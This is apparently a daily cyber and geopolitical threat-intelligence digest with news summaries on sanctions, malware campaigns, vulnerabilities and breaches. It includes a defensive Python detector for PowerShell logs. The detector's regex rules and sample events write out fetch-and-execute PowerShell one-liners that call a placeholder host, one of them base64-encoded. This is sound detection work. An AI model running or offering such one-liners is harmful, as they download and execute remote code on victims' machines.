Monday, Jan 27, 2025 // (IG): BB // GITHUB // SN R&D
Why Sanctions on Rosatom are Crucial for International Security
Bottom Line Up Front (BLUF): The U.S. has imposed sanctions on Rosatom leadership and banned Russian uranium imports, breaking a longstanding precedent of inaction against Russia’s nuclear energy sector. Rosatom, a key player in the global nuclear market, not only dominates uranium enrichment but also supplies dual-use technologies critical for Russian weapons production. Broader international sanctions are essential to sever Western reliance on Russian nuclear materials and limit its military-industrial growth.
Analyst Comments: The sanctions on Rosatom signify the beginning of a necessary shift in addressing Russia’s nuclear energy influence. Rosatom has long evaded significant international measures, leveraging its technological dominance and partnerships to fuel both civilian and military initiatives. The company’s contributions to Russian weapons manufacturing, such as cruise missiles used in Ukraine, highlight its dual-purpose role. The U.S. ban on uranium imports is an important precedent but must be followed by similar European action to isolate Rosatom and disrupt its economic and geopolitical utility entirely. Failure to act will allow Russia to continue leveraging its nuclear monopoly as both a financial and military asset.
FROM THE MEDIA: Rosatom controls 40% of global uranium conversion and 46% of enrichment capacity, enabling it to maintain a dominant position. The company’s core divisions remained untouched despite prior sanctions on select subsidiaries. Beyond civilian nuclear projects, Rosatom supports weapons development, including cruise missiles like the Kh-101, through its subsidiaries. These missiles have been used in Russia’s ongoing aggression against Ukraine. The sanctions aim to reduce Western reliance on Russian energy while exposing the company’s role in aiding military production.
READ THE STORY: Infonapalm
Ukrainian Cyber Specialists Launch Major Attack on Russian Telecom Provider MegaFon
Bottom Line Up Front (BLUF): Ukraine's Defense Intelligence cyber specialists have reportedly carried out a large-scale cyberattack on Russia's MegaFon, a major telecom and internet provider. The operation disrupted mobile communications, internet services, and several online platforms critical to the Russian military and government, such as Steam, Twitch, and Discord.
Analyst Comments: This operation highlights the increasing use of cyber warfare as a strategic tool in Ukraine's defense against Russian aggression. By targeting critical telecom infrastructure, Ukraine disrupts Russian military coordination and weakens civilian morale. Additionally, the attack demonstrates Ukraine's cyber capabilities and its ability to strike deep into critical Russian systems. Moving forward, such incidents could escalate retaliatory cyber measures from Russia, potentially involving NATO-aligned entities in the broader cyber conflict.
FROM THE MEDIA: Ukrainian Defense Intelligence executed a "carpet DDoS attack" on MegaFon, a leading Russian telecom operator, disrupting services in Moscow, St. Petersburg, and central Russian regions. The operation reportedly caused widespread communication and internet disruptions, affecting other providers like Yota and NetByNet. Russian media and Roskomnadzor initially attributed the issues to unspecified technical failures. However, later reports revealed the disruptions stemmed from Ukraine's cyber operation. Platforms frequently used by Russian military personnel, such as Steam, Twitch, and Discord, were also temporarily inaccessible. Despite MegaFon’s claim that its network was operating normally, the Ukrainian cyberattack has exposed vulnerabilities in Russian communication infrastructure, further complicating Russia's ongoing aggression against Ukraine.
READ THE STORY: Ukrainian News
China Deploys New Communication Technology Satellite
Bottom Line Up Front (BLUF): China successfully launched the Communication Technology Demonstrator 14 satellite using a Long March 3B rocket from the Xichang Satellite Launch Center. The satellite is designed to test advanced space-based communication technologies, including television, radio signal relay, and data transmission. This mission marks the sixth rocket launch of 2025 and the 558th flight of the Long March rocket family.
Analyst Comments: This satellite launch highlights China's continued investment in enhancing its space-based communication capabilities. The mission is significant for testing advanced technologies and strengthening the country's ability to support both civilian and military communication networks. The reliable Long March 3B rocket remains a critical asset in China's expanding space program, capable of supporting diverse missions, including geostationary, medium-Earth, and lunar transfer orbits. With six launches completed in 2025, China is accelerating its efforts to assert dominance in space exploration and technology development, further solidifying its global influence in the aerospace sector.
FROM THE MEDIA: China launched the Communication Technology Demonstrator 14 satellite aboard a Long March 3B carrier rocket at 11:32 PM local time from the Xichang Satellite Launch Center in Sichuan province. Developed by the Shanghai Academy of Spaceflight Technology, the satellite aims to test advanced communication capabilities, such as television and radio signal relay and data transmission. The Long March 3B rocket, a widely used and reliable model, stands 56.3 meters tall and weighs 456 metric tons when fully fueled. The rocket is designed to deploy up to 5.5 tons of payload into geostationary transfer orbits. This mission is the 558th flight of the Long March rocket series, reinforcing China’s position as a major player in global space exploration.
READ THE STORY: Spacewar
MintsLoader Malware Delivers StealC and BOINC in Targeted Cyber Attacks
Bottom Line Up Front (BLUF): A new campaign utilizing the PowerShell-based malware loader MintsLoader distributes the StealC information stealer and BOINC, an open-source computing platform. Delivered through spam emails and fake CAPTCHA pages, the attack targets the energy, legal, and oil sectors in the U.S. and Europe. The malware employs advanced evasion techniques and exploits social engineering tactics to bypass detection and infect systems.
Analyst Comments: The deployment of BOINC, typically a legitimate platform, shows how attackers are weaponizing trusted software for malicious purposes. The inclusion of the StealC stealer, designed to avoid Russian-aligned systems, suggests the involvement of a threat actor with specific geopolitical targets. Organizations must reinforce email security, conduct user awareness training, and enhance PowerShell monitoring to mitigate such threats.
FROM THE MEDIA: Cybersecurity researchers have uncovered an active campaign leveraging MintsLoader, a PowerShell-based malware loader, to distribute multiple payloads, including StealC and BOINC. eSentire detected the campaign in early January 2025, targeting critical industries such as energy, oil, gas, and legal services in the U.S. and Europe. Attackers use spam emails containing obfuscated JavaScript files or fake CAPTCHA prompts that instruct victims to execute malicious PowerShell scripts. Once executed, MintsLoader contacts a command-and-control (C2) server to download additional payloads, evade sandbox detection, and establish persistence. The campaign employs a Domain Generation Algorithm (DGA) to obfuscate C2 communications. One of the payloads, StealC, is a re-engineered information stealer known for its malware-as-a-service (MaaS) origins and its ability to bypass systems in certain post-Soviet states.
READ THE STORY: THN
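As an added defender-side example (not code from eSentire, THN or the campaign itself), the script below scores PowerShell Script Block Logging events (Event ID 4104) for the execution chain described in the MintsLoader story: a one-liner run from a fake CAPTCHA page, a hidden window, an execution-policy bypass, a download cradle and inline execution, including when the command is wrapped in -EncodedCommand. The rule weights, the alert threshold and the sample events are assumptions constructed for this example.

```python
"""Heuristic triage of PowerShell Script Block Logging events (Event ID 4104).

Constructed example for the MintsLoader story; not eSentire's or THN's code.
The events below are made up for illustration and are not MintsLoader samples.
The rules flag the chain the story describes: a user runs a one-liner shown by
a fake CAPTCHA page, PowerShell pulls a second stage, and the window is hidden.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# (name, weight, pattern). Weights and the threshold are assumptions chosen for
# this example, not values taken from any vendor detection content.
RULES = [
    ("encoded_command", 3, re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", 2, re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("download_cradle", 3, re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl)\b", re.I)),
    ("inline_exec", 3, re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("clipboard_source", 2, re.compile(r"\bGet-Clipboard\b", re.I)),
    ("persistence", 2, re.compile(r"\b(?:schtasks|Register-ScheduledTask)\b|CurrentVersion\\Run", re.I)),
]
ALERT_THRESHOLD = 5


def decode_encoded_command(text: str) -> str:
    """Return the UTF-16LE text behind an -EncodedCommand argument, or '' if none or invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


@dataclass
class Finding:
    record_id: int
    score: int
    hits: list[str] = field(default_factory=list)


def score_script_block(text: str) -> tuple[int, list[str]]:
    """Score one script block. The decoded -EncodedCommand payload is scored too,
    so base64 wrapping does not hide the download cradle from the rules."""
    corpus = text + "\n" + decode_encoded_command(text)
    hits = [name for name, _, rx in RULES if rx.search(corpus)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return score, hits


def triage(events: list[dict]) -> list[Finding]:
    """Return a Finding for each 4104 event whose score reaches ALERT_THRESHOLD."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4104:  # only script block text is scored here
            continue
        score, hits = score_script_block(ev["script_block"])
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(ev["record_id"], score, hits))
    return findings


# Constructed sample events; example.invalid is a reserved, non-resolving name.
_ENCODED = base64.b64encode("iex (iwr http://example.invalid/s)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"record_id": 1, "event_id": 4104,  # routine admin activity, no hits
     "script_block": r"Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\temp\svc.csv"},
    {"record_id": 2, "event_id": 4104,  # one-liner of the kind a fake CAPTCHA page tells the user to run
     "script_block": "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/verify')\""},
    {"record_id": 3, "event_id": 4104,  # same cradle, wrapped in -EncodedCommand
     "script_block": "powershell -nop -enc " + _ENCODED},
    {"record_id": 4, "event_id": 4104,  # legitimate download: one hit, below threshold
     "script_block": r"Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\reports\report.csv"},
    {"record_id": 5, "event_id": 4688,  # process-creation event: not a script block, ignored
     "script_block": "powershell -w hidden -ep bypass"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"record {f.record_id}: score {f.score} hits {', '.join(f.hits)}")
```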
Cisco Patches ClamAV Denial-of-Service Vulnerability with Exploit Code in the Wild
Bottom Line Up Front (BLUF): Cisco has addressed a ClamAV denial-of-service (DoS) vulnerability, identified as CVE-2025-20128, affecting Linux, Mac, and Windows systems. The flaw, caused by an integer underflow in the OLE2 decryption routine, could allow remote attackers to crash the ClamAV scanning process, resulting in service disruptions. A proof-of-concept (PoC) exploit code is publicly available, but Cisco has not detected any exploitation attempts in the wild.
Analyst Comments: The public availability of a PoC exploit increases the likelihood of attackers leveraging the flaw to disrupt operations or target vulnerable organizations. While Cisco’s swift response to release patches is commendable, organizations using affected ClamAV versions should prioritize updating to prevent potential service interruptions. The incident underscores the importance of monitoring security advisories and deploying patches promptly, particularly in environments relying heavily on open-source software.
FROM THE MEDIA: Cisco has released security updates to address a medium-impact vulnerability in its ClamAV antivirus engine, which is widely used for malware detection. The flaw (CVE-2025-20128) resides in the OLE2 decryption routine, where an integer underflow can cause a heap buffer overflow, potentially crashing the ClamAV scanning process. This vulnerability affects Secure Endpoint Connectors for Linux, Mac, and Windows, as well as the Secure Endpoint Private Cloud, with CVSS base scores of 6.9. The issue was reported by Google’s OSS-Fuzz program. While no exploitation in the wild has been observed, experts warn that a proof-of-concept (PoC) exploit is publicly available, increasing the urgency for affected users to apply Cisco’s patches immediately.
READ THE STORY: Securityaffairs
Trump's Economic Vision: A Return to Protectionism and Domestic Self-Reliance
Bottom Line Up Front (BLUF): President Trump has initiated a sweeping agenda to create a "Golden Age" for America, focusing on economic self-reliance, high tariffs, fossil fuel expansion, and domestic manufacturing. This vision accelerates protectionist policies while risking higher inflation, supply chain disruptions, and geopolitical tensions with allies and competitors.
Analyst Comments: While this strategy could bolster domestic industries and appeal to workers, it risks alienating multinational corporations, increasing consumer costs, and intensifying trade disputes. The administration’s actions reflect an ambition to reshape America’s role in the global economy, but the long-term sustainability of such an inward-facing model remains uncertain.
FROM THE MEDIA: President Trump has launched a flurry of executive orders promoting domestic manufacturing, imposing high import tariffs, and advancing oil and gas production. Tariffs of 10% on Chinese goods and 25% on imports from Canada and Mexico are set to take effect February 1, raising concerns over supply chain disruptions. Trump’s rhetoric draws comparisons to President McKinley, invoking protectionist policies of the Gilded Age. However, critics argue that this strategy could exacerbate inflation and undermine economic growth, with some economists warning of potential conflicts between tariffs, tax cuts, and energy policies. Labor union leaders and economic analysts have expressed mixed views on whether these measures will deliver tangible benefits for American workers.
READ THE STORY: FT
GamaCopy Threat Actor Mimics Gamaredon Tactics in Cyber Espionage Against Russian Entities
Bottom Line Up Front (BLUF): A new cyber espionage group named GamaCopy has been identified using tactics similar to the Kremlin-aligned Gamaredon group to target Russian-speaking entities. The campaign employs spear-phishing emails to deliver UltraVNC via self-extracting archives, enabling remote access to compromised systems. GamaCopy’s mimicry of Gamaredon’s tactics, combined with its use of open-source tools, complicates attribution and highlights evolving threats in the cyber espionage landscape.
Analyst Comments: The emergence of GamaCopy underscores the trend of threat actors imitating established groups to confuse researchers and hinder attribution efforts. By copying Gamaredon’s tactics, GamaCopy not only obscures its true identity but also capitalizes on known successful attack methods. The use of open-source tools like UltraVNC as payloads further demonstrates how attackers can leverage legitimate software to mask malicious intent. This campaign also emphasizes the ongoing cyber threat landscape shifts resulting from the Russo-Ukrainian war, with multiple groups targeting Russian entities for espionage purposes.
READ THE STORY: THN
Egypt and Cyprus Discuss Strategic Cooperation on Natural Gas Development
Bottom Line Up Front (BLUF): Egypt and Cyprus are advancing plans to jointly develop natural gas fields, including the "Kronos" and "Aphrodite" fields, to transport gas to Egypt for liquefaction and export. This cooperation strengthens Egypt’s position as a regional energy hub and enhances energy security in the Eastern Mediterranean and Europe.
Analyst Comments: The focus on accelerating production and creating an energy corridor underscores the region’s strategic importance in linking Eastern Mediterranean gas reserves to European markets. Egypt’s well-established LNG infrastructure positions it as a key player in regional energy integration. Future cooperation may depend on the successful resolution of legal, commercial, and technical frameworks and ongoing geopolitical stability in the region.
FROM THE MEDIA: Egyptian Petroleum Minister Karim Badawi and Cypriot Energy Minister George Papanastasiou met in Nicosia to build on discussions initiated at the recent Trilateral Cooperation Mechanism summit with Greece. The two ministers agreed on linking Cyprus’s "Kronos" and "Aphrodite" gas fields to Egypt’s advanced LNG facilities to accelerate production at reduced costs. The project is expected to create an energy corridor connecting the Eastern Mediterranean to Europe, enhancing energy security and maximizing the utilization of gas resources. With Egypt’s robust LNG infrastructure, including processing plants and transportation networks, the collaboration will support the export of liquefied gas to global markets. Additionally, Badawi extended an invitation to Papanastasiou to attend the Egypt Energy Show (EGYPES 2025) in February to further deepen cooperation in the energy sector.
READ THE STORY: Egypt Today
Subaru Starlink Flaw Exposes Vehicles and Customer Accounts to Remote Attacks
Bottom Line Up Front (BLUF): Security researchers Sam Curry and Shubham Shah uncovered a critical vulnerability in Subaru’s Starlink-connected vehicle service, exposing vehicles and customer accounts in the US, Canada, and Japan to potential remote exploitation. The flaw enabled unauthorized access to vehicle controls, personal data, and location history. Subaru patched the vulnerability within 24 hours of being notified.
Analyst Comments: This incident underscores the critical need for robust cybersecurity measures in the automotive industry, particularly as connected vehicle services become more widespread. Subaru's rapid response is commendable, but the discovery highlights ongoing weaknesses in system design, such as insecure admin portals and poor multi-factor authentication (MFA) implementation. The ability to remotely control vehicles and access sensitive data presents a significant risk to users and reinforces the importance of comprehensive security testing during development. As connected car technologies proliferate, similar vulnerabilities could lead to more widespread attacks unless addressed proactively.
FROM THE MEDIA: Security researchers identified a flaw in Subaru’s Starlink platform that allowed attackers with minimal information—such as a victim’s last name, ZIP code, email, or license plate—to remotely access and control vehicles. The vulnerability also exposed sensitive data, including location history, personal details, and billing information. The exploit stemmed from Subaru's admin panel, which researchers discovered via subdomain scans. The team bypassed two-factor authentication and gained admin-level access by analyzing source code and exploiting a password reset endpoint. Once inside, they demonstrated the ability to remotely unlock a vehicle without the owner receiving any notifications. The vulnerability was responsibly disclosed to Subaru on November 20, 2024, and the company patched the issue within 24 hours.
READ THE STORY: Securityaffairs
OneBlood Data Breach Exposes Donor Social Security Numbers
Bottom Line Up Front (BLUF): OneBlood, a Florida-based nonprofit blood donation organization, suffered a cyberattack over the summer of 2024, exposing personal information, including Social Security numbers, of its donors. A class-action lawsuit alleges the organization failed to protect sensitive data and delayed notifying affected individuals.
Analyst Comments: This breach underscores the critical importance of timely breach detection and disclosure within organizations handling sensitive personal data. While OneBlood’s credit monitoring offer may address immediate risks, the delayed notification raises concerns about transparency and preparedness. Such incidents reinforce the need for stricter data protection measures and robust cybersecurity protocols, particularly in nonprofit organizations managing public trust.
FROM THE MEDIA: A class-action lawsuit filed by Amy Thrash in federal court alleges that OneBlood did not act swiftly to protect sensitive donor data during a cyberattack between July 14 and July 29, 2024. OneBlood reportedly became aware of the breach on July 28 but only completed its review of compromised data in December. The nonprofit began notifying affected individuals on January 9, 2025. The breach allegedly included Social Security numbers and personal details of donors, although the exact number of affected individuals remains undisclosed. Thrash claims she has experienced increased spam and now spends significant time monitoring her accounts for fraud. OneBlood has denied the allegations, stating that they acted promptly to investigate the incident and notify affected individuals in compliance with legal requirements. The organization is offering 12 months of credit monitoring to those impacted. The lawsuit also seeks damages and demands 10 years of credit monitoring as compensation for the delayed notification.
READ THE STORY: WFTV9
Slovak Prime Minister Accuses Ukraine of Cyberattack, Kyiv Strongly Denies Allegation
Bottom Line Up Front (BLUF): The Ukrainian Ministry of Foreign Affairs has categorically denied allegations from Slovak Prime Minister Robert Fico, who accused Ukraine of carrying out a cyberattack on Slovakia's national health insurance company. Local media later clarified that the incident was likely a phishing attempt rather than a large-scale cyberattack.
Analyst Comments: This diplomatic dispute highlights the fragility of relations between Ukraine and Slovakia under Robert Fico's leadership. Fico’s accusations against Ukraine may reflect his administration's skepticism toward Kyiv amidst ongoing regional tensions. By rejecting the claims, Ukraine signals its commitment to maintaining positive relations with Slovakia, an important NATO ally. However, Fico’s rhetoric could strain cooperation between the two nations, potentially impacting broader regional security dynamics.
FROM THE MEDIA: Slovak Prime Minister Robert Fico alleged that a "massive cyberattack" had targeted Slovakia’s national health insurance company and blamed Ukraine for the incident. Ukraine’s Ministry of Foreign Affairs strongly denied any involvement, calling the accusations baseless and urging Fico to stop looking for “imaginary enemies.” Slovak media reported that the event was not a sophisticated cyberattack but rather a phishing attempt aimed at the organization.
READ THE STORY: FREEDOM
Beirut Airport Cyberattack Breaches Flight Information Display System (FIDS)
Bottom Line Up Front (BLUF): Hackers launched a cyberattack on Beirut's Rafic Hariri International Airport, breaching the Flight Information Display System (FIDS) and displaying politically charged messages. The Baggage Handling System (BHS) was also disrupted, forcing airport personnel to rely on police dogs for baggage inspection. No group has claimed responsibility for the attack, which comes amid rising tensions between Israel and Lebanon.
Analyst Comments: The breach of critical infrastructure like FIDS and BHS at an international airport highlights the increasing risks to aviation systems. Politically motivated messages displayed by the attackers suggest the use of cyber operations to escalate regional tensions. The disruption to baggage inspection processes underscores the operational impact such attacks can have on airport functionality. This incident reinforces the need for robust cybersecurity measures for aviation systems, particularly in geopolitically sensitive areas. While attribution remains unclear, organizations in the region should remain vigilant against further potential cyber threats.
FROM THE MEDIA: Threat actors breached the Flight Information Display System (FIDS) at Rafic Hariri International Airport, Lebanon’s main gateway for domestic and international travel. The hackers displayed messages accusing Hezbollah and Iran of dragging the country into war and enabling arms smuggling that could endanger the airport. The attack also disrupted the airport’s Baggage Handling System (BHS), forcing personnel to use police dogs for baggage inspection. Lebanese outlet LBCI tied the attack to escalating tensions with Israel, though no group has claimed responsibility. The airport is a vital hub located 9 kilometers from Beirut’s city center, making the attack a significant disruption.
READ THE STORY: Securityaffairs
Items of interest
Philippines Halts Research Survey in South China Sea Amid Chinese "Harassment"
Bottom Line Up Front (BLUF): The Philippines suspended a marine scientific survey near Thitu Island in the contested South China Sea after Chinese navy and coast guard vessels allegedly engaged in "dangerous" harassment. The confrontation underscores escalating tensions between the two nations over disputed territories in the Spratly Islands.
Analyst Comments: The suspension of the survey reflects the challenges smaller nations face when asserting sovereignty in contested areas. Such actions may lead to further regional alignment against China's maritime claims, potentially amplifying international calls for adherence to the 2016 arbitration tribunal ruling, which invalidated China's expansive claims. Continued Chinese harassment could increase the risk of direct confrontation, testing diplomatic and security frameworks in the region.
FROM THE MEDIA: The Philippine Coast Guard announced the suspension of a marine scientific survey near Thitu Island on January 25, 2025, due to harassment by Chinese vessels. The survey, intended to collect sand samples from sandbars near Thitu Island, was halted after three Chinese coast guard vessels and four smaller boats made "aggressive maneuvers" towards the Philippine research ships and their inflatable boats. Additionally, a Chinese navy helicopter reportedly hovered at an unsafe altitude over the Filipino vessels, creating hazardous conditions with its rotor wash. While no accidents occurred, the Philippine Coast Guard cited these actions as a disregard for safety, forcing the operation's suspension. China, in response, accused the Philippine vessels of attempting to "illegally" land on Sandy Cay (referred to as Tiexian Reef by Beijing) and asserted its "unquestionable sovereignty" over the area. Chinese coast guard vessels claimed to have "repelled" the Filipino boats.
READ THE STORY: Spacewar
PH stops research survey after Chinese 'harassment' in disputed sea (Video)
FROM THE MEDIA: Handout footage from the Philippine Coast Guard shows alleged 'dangerous' harassment by Chinese Navy and Coast Guard vessels of Philippine boats transporting scientists intending to conduct a 'marine scientific survey and sand sampling' at a sandbar off Thitu island in the contested South China Sea. Three Chinese Coast Guard vessels and four smaller boats made 'aggressive maneuvers' toward two Philippine Bureau of Fisheries and Aquatic Resources ships and their inflatable boats this month, near Thitu island, a Philippine Coast Guard statement said.
Philippines Faces Down China's 'Monster' Ship (Video)
FROM THE MEDIA: China has begun 2025 with a near-continuous presence of its 165-meter “monster” coast guard ship in the Philippines’ exclusive economic zone (EEZ) off the Philippine coast of Zambales. A further 60 to 70 nautical miles to the west is Scarborough Shoal, seized by China in 2012 but located within Manila's EEZ. The West Philippine Coast Guard says Beijing seeks to “normalize” its presence in this area and thereby change the status quo. In this show, South China Sea expert Liu Fu-kuo said that Chinese reports show it plans to militarize Scarborough Shoal to enhance the feature's strategic value, with Beijing waiting for an appropriate time.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.